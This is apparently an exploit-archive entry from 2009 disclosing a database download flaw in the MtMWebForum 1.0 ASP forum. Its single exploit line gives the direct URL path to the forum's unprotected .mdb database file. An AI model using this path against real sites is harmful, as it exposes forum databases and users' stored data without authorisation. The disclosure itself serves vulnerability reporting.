id: 10492
date: 12/29/2009
title: Fully Functional ASP Forum 1.0 DB Download Vulnerability
author: indoushka
cves: 

========================================================
Fully Functional ASP Forum 1.0 DB Download Vulnerability
========================================================

========================================================================================                 
| # Title    : FULLY FUNCTIONAL ASP FORUM - MtMWebForum 1.0 DB Download Vulnerability  |
| # Author   : indoushka                                                               |
| # Script   : FULLY FUNCTIONAL ASP FORUM - MtMWebForum 1.0                            |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/FULLY/ForumDb.mdb



#  0day.today [2023-03-27]  #